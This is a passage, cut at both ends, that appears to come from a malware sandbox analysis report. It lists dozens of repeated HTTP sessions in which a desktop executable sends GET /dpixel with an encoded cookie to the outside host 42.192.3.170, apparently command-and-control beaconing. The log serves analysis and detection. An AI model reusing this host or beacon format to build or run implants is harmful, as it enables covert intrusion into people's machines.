                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:08 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:08 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.44973742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:10 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:10 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:10 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.44973842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:11 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:12 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:12 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.44974042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:13 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:14 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:14 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.44974542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:15 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:16 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:16 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.44974742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:17 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:18 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:17 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.44974842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:19 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:19 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:19 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.44974942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:21 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:21 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:21 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.44975042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:23 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:23 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:23 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.44975142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:24 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:25 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:25 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.44975242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:26 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:27 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:27 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.44975342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:28 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:29 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:29 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.44975442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:30 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:31 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:31 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.44975542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:32 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:33 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.44975642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:34 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:35 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:34 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.44975742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:36 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:36 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:36 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.44975842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:38 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:39 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:39 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.44975942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:40 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:41 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:40 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.44976042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:42 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:42 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:42 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.44976142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:44 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:44 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:44 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.44976242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:46 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:46 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:46 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.44976342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:48 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:48 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:48 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.44976442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:50 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:50 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:50 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.44976542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:51 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:52 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:52 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.44976742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:53 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:54 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:54 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.44976942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:55 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:56 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:56 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.44978042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:57 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:58 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:57 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.44979442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:52:59 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:52:59 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:52:59 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.44980742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:01 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:01 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:01 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.44981942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:03 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:53:03 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:53:03 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.44983242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:53:05 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
